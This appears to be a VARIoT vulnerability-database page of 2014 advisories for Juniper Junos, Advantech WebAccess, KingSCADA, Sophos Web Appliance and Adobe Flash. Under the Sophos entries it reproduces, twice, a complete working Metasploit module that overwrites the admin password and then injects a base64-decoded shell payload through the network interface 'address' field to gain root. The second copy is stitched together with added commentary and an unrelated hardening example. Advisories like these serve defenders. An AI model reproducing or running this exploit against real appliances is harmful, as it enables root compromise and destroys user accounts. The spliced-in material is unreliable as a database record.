VARIoT IoT vulnerabilities database
| VAR-201404-0649 | CVE-2014-2711 | Juniper Junos J-Web cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in J-Web in Juniper Junos before 11.4R11, 11.4X27 before 11.4X27.62 (BBE), 12.1 before 12.1R9, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.2 before 12.2R7, 12.3 before 12.3R6, 13.1 before 13.1R4, 13.2 before 13.2R3, and 13.3 before 13.3R1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Juniper Junos is prone to an HTML-injection vulnerability.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Juniper Networks Junos is the network operating system that runs on Juniper Networks hardware; it provides a secure programming interface and the Junos SDK. J-Web is the web-based management tool for routers and switches running Junos. The following releases are affected: Juniper Networks Junos Release 13.1 through 13.3, Release 12.1 through 12.3, 12.1X44, 12.1X45, 12.1X46, 11.4 and 11.4X27.
| VAR-201404-0634 | CVE-2014-2714 | Juniper Junos denial of service (DoS) vulnerability on SRX Series services gateways |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The Enhanced Web Filtering (EWF) in Juniper Junos before 10.4R15, 11.4 before 11.4R9, 12.1 before 12.1R7, 12.1X44 before 12.1X44-D20, 12.1X45 before 12.1X45-D10, and 12.1X46 before 12.1X46-D10, as used in the SRX Series services gateways, allows remote attackers to cause a denial of service (flow daemon crash and restart) via a crafted URL. Juniper Junos is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Juniper Networks Junos is the network operating system that runs on Juniper Networks hardware; it provides a secure programming interface and the Junos SDK. The following versions are affected: Juniper Networks Junos 10.4, 11.4, 12.1X44, 12.1X45, 12.1X46 and 12.1.
| VAR-201404-0168 | CVE-2014-0612 | Juniper Junos denial of service (DoS) vulnerability with Dynamic IPsec VPN configured |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Juniper Junos before 11.4R10-S1, before 11.4R11, 12.1X44 before 12.1X44-D26, 12.1X44 before 12.1X44-D30, 12.1X45 before 12.1X45-D20, and 12.1X46 before 12.1X46-D10, when Dynamic IPsec VPN is configured, allows remote attackers to cause a denial of service (new Dynamic VPN connection failures and CPU and disk consumption) via unknown vectors. Juniper Junos is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Juniper Networks Junos is the network operating system that runs on Juniper Networks hardware; it provides a secure programming interface and the Junos SDK. The following versions are affected: Juniper Networks Junos 12.1X45, 12.1X46, 12.1, 12.1X44 and 11.4.
| VAR-201404-0542 | CVE-2014-0767 | Advantech WebAccess AccessCode Parameter Handling Stack Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker may exploit this vulnerability by passing an overly long value in the AccessCode argument to the control. This overflows the static stack buffer, and the attacker may then execute code on the target device remotely. Advantech WebAccess contains a stack-based buffer overflow vulnerability: a third party may execute arbitrary code via an overly long AccessCode argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webvact.ocx ActiveX control. The control does not check the length of an attacker-supplied AccessCode string before copying it into a fixed-length buffer on the stack. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing the AccessCode parameter, allowing remote attackers to submit specially crafted parameters that trigger a stack buffer overflow, causing the application to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment.
| VAR-201404-0547 | CVE-2014-0772 | Advantech WebAccess bwocxrun.ocx OpenUrlToBufferTimeout Method Arbitrary File Access Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The BWOCXRUN.BwocxrunCtrl.1 control contains a method named OpenUrlToBufferTimeout. This method takes a URL as a parameter and returns its contents to the caller in JavaScript. The URLs are accessed in the security context of the current browser session. The control does not perform any URL validation and allows file:// URLs that access the local disk. The method can be used to open a URL (including file URLs) and read its contents through JavaScript. This method could also be used to reach any arbitrary URL to which the browser has access. This vulnerability allows remote attackers to access arbitrary files on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the bwocxrun.ocx control. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment.
| VAR-201404-0543 | CVE-2014-0768 | Advantech WebAccess Vulnerable to stack-based buffer overflow |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker may pass an overly long value in the AccessCode2 argument to the control to overflow the static stack buffer. The attacker may then remotely execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webvact.ocx ActiveX control. The control does not check the length of an attacker-supplied AccessCode2 string before copying it into a fixed-length buffer on the stack. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing Username parameters, allowing remote attackers to submit specially crafted parameters that trigger a stack buffer overflow, causing the application to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions.
| VAR-201404-0538 | CVE-2014-0763 | Advantech WebAccess of DBVisitor.dll In SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker may perform SQL injection because arguments are used to construct queries without proper sanitization. DBVisitor.dll is exposed through SOAP interfaces, and the exposed functions are vulnerable to SOAP injection. This may allow unexpected SQL actions, access to records in the software database tables, or execution of arbitrary code. DBVisitor.dll in Advantech WebAccess contains an SQL injection vulnerability: a third party may execute arbitrary SQL commands via a SOAP request to unspecified functions. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBVisitor.dll component. These flaws allow an attacker to execute arbitrary SQL statements in the context of the web service and to exfiltrate data (including account names and password hashes) from the vulnerable product. Advantech WebAccess is HMI/SCADA software. There is an SQL injection vulnerability in Advantech WebAccess. Because the SOAP interface exposes DBVisitor.dll, an attacker can submit a specially crafted SOAP request, inject or manipulate an SQL query, and obtain sensitive information or manipulate the database. Advantech WebAccess is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, to access or modify data, or to exploit vulnerabilities in the underlying database.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment.
| VAR-201404-0539 | CVE-2014-0764 | Advantech WebAccess Vulnerable to stack-based buffer overflow |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
By providing an overly long string in the NodeName parameter, an attacker may be able to overflow the static stack buffer. The attacker may then execute code on the target device remotely. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webvact.ocx ActiveX control. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing the NodeName parameter, allowing remote attackers to submit specially crafted parameters that trigger a stack buffer overflow, causing the application to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions.
| VAR-201404-0546 | CVE-2014-0771 | Advantech WebAccess bwocxrun.ocx Arbitrary File Access Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: HIGH |
The BWOCXRUN.BwocxrunCtrl.1 control contains a method named OpenUrlToBuffer. This method takes a URL as a parameter and returns its contents to the caller in JavaScript. The URLs are accessed in the security context of the current browser session. The control does not perform any URL validation and allows file:// URLs that access the local disk. The method can be used to open a URL (including file URLs) and read its contents through JavaScript. This method could also be used to reach any arbitrary URL to which the browser has access. This vulnerability allows remote attackers to access arbitrary files on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the bwocxrun.ocx control. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment.
| VAR-201404-0541 | CVE-2014-0766 | Advantech WebAccess NodeName2 Parameter Handling Stack Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker can exploit this vulnerability by supplying an overly long NodeName2 argument, which is copied into a statically sized buffer on the stack and overflows it. An attacker may use this vulnerability to remotely execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webvact.ocx ActiveX control. The control does not check the length of an attacker-supplied NodeName2 string before copying it into a fixed-length buffer on the stack. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing the NodeName2 parameter, allowing remote attackers to submit specially crafted parameters that trigger a stack buffer overflow, causing the application to crash or execute arbitrary code. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions.
| VAR-201404-0438 | CVE-2014-2849 | Sophos Web Appliance Change Password dialog box admin user password change vulnerability |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability. The specific flaws exist within the change_password and netinterface functions of the web appliance. The first flaw allows an unprivileged user to change the admin's password, and a remote code execution vulnerability exists when updating the network interface. This allows an attacker to execute commands with root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control of applications, etc.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution',
      'Description'    => %q{
        This module takes advantage of two vulnerabilities in order to gain remote code execution as root
        as an otherwise non-privileged authorized user.
        No server-side sanitization is done on values passed when configuring a static network interface.
        This allows an administrator user to run arbitrary commands in the context of the web application,
        which is root when configuring the network interface. This module will inadvertently delete
        any other users that may have been present as a side effect of changing the admin's password.
      },
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 500,
          'DisableNops' => true,
          'BadChars'    => "", # base64 encryption ftw!
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet'
            }
        },
      'Targets'        =>
        [
          [ 'Sophos Web Protection Appliance 3.8.1.1', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 8 2014'
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        Opt::RPORT(443)
      ],
      self.class
    )
  end

  def exploit
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })

    if !init or !init.body
      fail_with("Could not connect to host")
    end

    print_status("Getting STYLE key...")

    style = ''
    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end

    if style == ''
      fail_with("Could not find style key.")
    end

    post = {
      'STYLE'       => style,
      'destination' => '',
      'section'     => '',
      'username'    => datastore['USERNAME'],
      'password'    => datastore['PASSWORD']
    }

    print_status("Authenticating as " + datastore['USERNAME'])

    login = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, '/index.php?c=login'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
      fail_with("Authentication failed")
    end

    # I don't know what salt is being used to hash these
    # passwords (probably in js somewhere), so I have
    # to use a static one that I saw being POSTed while
    # exploring, it is 'notpassword'.
    #
    # This will actually delete every other user that exists
    # except for admin, whose password will be changed
    #
    # whoops
    admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
    admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
    admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
    admin_hash << ': [], "user_id": 0}]'

    post = {
      'action'   => 'save',
      'STYLE'    => style,
      'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
      'current'  => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'new'      => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'admins'   => admin_hash
    }

    print_status("Changing old password hash to notpassword")

    passchange = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, '/index.php?c=change_password'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !passchange or passchange.code != 200
      fail_with("Couldn't update admin's password")
    end

    print_status("Logging in as the admin now")

    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })

    if !init or init.code != 200
      fail_with("Couldn't reget index page for admin auth")
    end

    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end

    post = {
      'STYLE'       => style,
      'destination' => '',
      'section'     => '',
      'username'    => 'admin',
      'password'    => 'notpassword'
    }

    login = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'index.php?c=login'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !login or login.code != 200 or login.body !~ /admin<\/a>/
      fail_with("Couldn't login as admin")
    end

    pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))

    post = {
      'STYLE'       => style,
      'dhcp'        => 'no',
      'address'     => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
      'gateway'     => '192.168.1.254',
      'sb_bridge'   => 'explicit',
      'netmask'     => '255.255.255.0',
      'sb_linktype' => 'auto',
      'dns'         => 'yes',
      'dns1'        => '192.168.1.254',
      'dns2'        => '',
      'dns3'        => ''
    }

    print_status("Sending payload")

    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
      'method'    => 'POST',
      'vars_post' => post,
    })
  end
end
| VAR-201404-0545 | CVE-2014-0770 | Advantech WebAccess Vulnerable to stack-based buffer overflow |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
By providing an overly long string in the UserName parameter, an attacker may be able to overflow the static stack buffer. The attacker may then execute code on the target device remotely. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webvact.ocx ActiveX control. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing NodeName parameters, allowing remote attackers to submit specially crafted parameters that trigger a stack buffer overflow, causing the application to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions.
| VAR-201404-0552 | CVE-2014-0787 | WellinTech KingSCADA Stack Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in WellinTech KingSCADA before 3.1.2.13 allows remote attackers to execute arbitrary code via a crafted packet. Authentication is not required to exploit this vulnerability. The specific flaw exists within the protocol parsing code contained in kxNetDispose.dll. The parent service is called AEserver.exe and listens on port 12401. The process performs arithmetic on a user-supplied value used to determine the size of a copy operation, allowing a potential integer wrap to cause a stack buffer overflow. An unauthenticated attacker can leverage this vulnerability to execute code in the context of the SYSTEM user. The KingSCADA family of products is a Windows-based monitoring and data acquisition application. WellinTech KingSCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed attacks will likely cause denial-of-service conditions.
KingSCADA versions prior to 3.1.2.13 are vulnerable.
| VAR-201404-0540 | CVE-2014-0765 | Advantech WebAccess GotoCmd Parameter Handling Stack Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
To exploit this vulnerability, the attacker passes data in the GotoCmd argument to the control. If the value of the argument is overly long, the static stack buffer can be overflowed, allowing the attacker to execute arbitrary code remotely. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webvact.ocx ActiveX control. The control does not check the length of an attacker-supplied GotoCmd string before copying it into a fixed-length buffer on the stack. Advantech WebAccess is HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing the GotoCmd parameter, allowing remote attackers to submit specially crafted parameters that trigger a stack buffer overflow, causing the application to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions.
| VAR-201404-0548 | CVE-2014-0773 | Advantech WebAccess bwocxrun.ocx CreateProcess Method Remote Command Execution Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The BWOCXRUN.BwocxrunCtrl.1 control contains a method named CreateProcess. This method contains validation intended to ensure an attacker cannot run arbitrary command lines. After validation, the values supplied in the HTML are passed to the Windows CreateProcessA API. The validation can be bypassed, allowing arbitrary command lines to be run. The command line can specify running remote files (for example, a UNC command line). A function exists at offset 100019B0 of bwocxrun.ocx. Inside this function, there are 3 calls to strstr to check the contents of the user-specified command line. If "\setup.exe", "\bwvbprt.exe", or "\bwvbprtl.exe" is contained in the command line (strstr returns a nonzero value), the command line passes validation and is then passed to CreateProcessA. The CreateProcess method of the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess contains a vulnerability that allows (1) setup.exe, (2) bwvbprt.exe, or (3) bwvbprtl.exe to be executed from an arbitrary pathname. Supplementary information: the vulnerability type has been identified by CWE as CWE-77: Improper Neutralization of Special Elements used in a Command (Command Injection), http://cwe.mitre.org/data/definitions/77.html. A third party may execute (1) setup.exe, (2) bwvbprt.exe, or (3) bwvbprtl.exe from an arbitrary pathname via a crafted argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within bwocxrun.ocx. The control exposes a scriptable method 'CreateProcess'. Advantech WebAccess is HMI/SCADA software.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides remote control and management of automation equipment.
| VAR-201404-0453 | CVE-2014-2850 | Sophos Web Appliance arbitrary command execution vulnerability in the network interface configuration page |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
The network interface configuration page (netinterface) in Sophos Web Appliance before 3.8.2 allows remote administrators to execute arbitrary commands via shell metacharacters in the address parameter. Sophos Web Appliance is prone to a privilege-escalation vulnerability and remote code-execution vulnerability.
Attackers can leverage these issues to gain root privileges and execute arbitrary code. Successfully exploiting these issues will result in the complete compromise of affected computers.
Versions prior to Sophos Web Appliance 3.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control of applications, etc.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution',
'Description' => %q{
This module takes advantage of two vulnerabilities in order to gain remote code execution as root
as an otherwise non-privileged authorized user. By taking advantage of a mass assignment
vulnerability that allows an unprivileged authenticated user to change the admininistrator's
password hash, the module updates the password to login as the admin to reach the second vulnerability.
No server-side sanitization is done on values passed when configuring a static network interface. This module will inadvertently delete
any other users that may have been present as a side effect of changing the admin's password.
},
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'DisableNops' => true,
'BadChars' => "", #base64 encryption ftw!
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet'
}
},
'Targets' =>
[
[ 'Sophos Web Protection Appliance 3.8.1.1', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 8 2014'
))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        Opt::RPORT(443)
      ],
      self.class
    )
  end

  def exploit
    # Step 1: fetch the login page and pull out the hidden STYLE form value;
    # the module echoes it back in every later POST.
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })
    if !init or !init.body
      fail_with("Could not connect to host")
    end

    print_status("Getting STYLE key...")
    style = ''
    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end
    if style == ''
      fail_with("Could not find style key.")
    end

    # Step 2: log in with the supplied (non-admin) credentials.
    post = {
      'STYLE' => style,
      'destination' => '',
      'section' => '',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    }
    print_status("Authenticating as " + datastore['USERNAME'])
    login = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
      'method' => 'POST',
      'vars_post' => post
    })
    if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
      fail_with("Authentication failed")
    end

    # Step 3: the change_password handler accepts a client-supplied 'admins'
    # list, so an ordinary user can overwrite the admin account record and set
    # its password hash to the one for 'notpassword'.
    #
    #I don't know what salt is being used to hash these
    #passwords (probably in js somewhere), so I have
    #to use a static one that I saw being POSTed while
    #exploring, it is 'notpassword'.
    #
    #This will actually delete every other user that exists
    #except for admin, whose password will be changed
    #
    #whoops
    admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
    admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
    admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
    admin_hash << ': [], "user_id": 0}]'
    post = {
      'action' => 'save',
      'STYLE' => style,
      'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
      'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'admins' => admin_hash
    }
    print_status("Changing old password hash to notpassword")
    passchange = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
      'method' => 'POST',
      'vars_post' => post
    })
    if !passchange or passchange.code != 200
      fail_with("Couldn't update admin's password")
    end

    # Step 4: fetch a fresh STYLE value and log in as admin with the new password.
    print_status("Logging in as the admin now")
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })
    if !init or init.code != 200
      fail_with("Couldn't reget index page for admin auth")
    end
    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end
    post = {
      'STYLE' => style,
      'destination' => '',
      'section' => '',
      'username' => 'admin',
      'password' => 'notpassword'
    }
    login = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
      'method' => 'POST',
      'vars_post' => post
    })
    if !login or login.code != 200 or login.body !~ /admin<\/a>/
      fail_with("Couldn't login as admin")
    end

    # Step 5: command injection. The network interface form passes the
    # 'address' field to a shell, so backticks embedded in what looks like an
    # IP address run the base64-decoded payload on the appliance.
    pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
    post = {
      'STYLE' => style,
      'dhcp' => 'no',
      'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
      'gateway' => '192.168.1.254',
      'sb_bridge' => 'explicit',
      'netmask' => '255.255.255.0',
      'sb_linktype' => 'auto',
      'dns' => 'yes',
      'dns1' => '192.168.1.254',
      'dns2' => '',
      'dns3' => ''
    }
    print_status("Sending payload")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
      'method' => 'POST',
      'vars_post' => post,
    })
  end
end
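The last POST above is the whole point of the chain: the appliance hands the address field to a shell, so a value that still looks like an IPv4 literal can carry a command in backticks. The Ruby below is an added example, not part of the module or of the appliance's own code; the handler shape, the interface name and the ifconfig command line are assumptions. It puts the vulnerable string-building pattern next to two independent fixes (parse the value with IPAddr, and pass an argv array so no shell is involved), plus a metacharacter check that can double as a detection over request logs for this field.

```ruby
require 'ipaddr'

# Added example, not part of the module above or of the appliance's own code.
# The handler shape, the interface name and the ifconfig command line are
# assumptions chosen to illustrate the pattern the module's last POST abuses.

# Constructed inputs. INJECTED_ADDRESS is the shape the module sends in the
# 'address' field: two halves of a plausible IPv4 literal with a backtick
# command substitution between them. The decoded payload here is just
# `echo pwned`; the real module substitutes its encoded stager.
INJECTED_ADDRESS = "192.16`echo ZWNobyBwd25lZA==|base64 --decode|sh`8.1.16".freeze
BENIGN_ADDRESS   = "192.168.1.16".freeze
NETMASK          = "255.255.255.0".freeze

# Vulnerable pattern: the submitted value is interpolated into one command
# string destined for /bin/sh. Returned rather than executed so it can be
# inspected; a shell would run the backtick section first.
def vulnerable_command(address, netmask)
  "ifconfig eth0 #{address} netmask #{netmask}"
end

# Characters that a POSIX shell treats as syntax rather than data. Useful both
# as an input reject list and as a detection over request logs for this field.
SHELL_META = /[`$;&|<>(){}\n\\'"]/

def shell_injection?(value)
  !!(value =~ SHELL_META)
end

# Fix 1: parse, do not pattern-match. IPAddr accepts only well-formed IPv4/IPv6
# literals, so the injected string never reaches a command line. Returns the
# canonical address text.
def validated_address(value)
  ip = IPAddr.new(value.to_s)
  raise ArgumentError, "expected an IPv4 host address" unless ip.ipv4?
  ip.to_s
rescue IPAddr::InvalidAddressError
  raise ArgumentError, "not an IP address: #{value.inspect}"
end

# Fix 2: build argv instead of a string. Given an array, Kernel#system and
# Process.spawn exec the program directly; no shell parses the arguments, so
# even a value that slipped past validation is only ever an argument.
def hardened_argv(address, netmask)
  ["ifconfig", "eth0", validated_address(address), "netmask", validated_address(netmask)]
end

if __FILE__ == $0
  puts "vulnerable: #{vulnerable_command(INJECTED_ADDRESS, NETMASK)}"
  puts "suspicious: #{shell_injection?(INJECTED_ADDRESS)}"
  puts "hardened:   #{hardened_argv(BENIGN_ADDRESS, NETMASK).inspect}"
  begin
    hardened_argv(INJECTED_ADDRESS, NETMASK)
  rescue ArgumentError => e
    puts "rejected:   #{e.message}"
  end
  # To actually apply it (not done here): system(*hardened_argv(addr, mask))
end
```

Both fixes are worth having: validation stops the bad value at the edge, and the argv form means a future field that is not an IP address (a hostname, a DNS search domain) cannot reintroduce the bug by being concatenated into a shell string.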
| VAR-201404-0199 | CVE-2014-0508 | Adobe Flash Player and Adobe AIR access restriction bypass vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors.
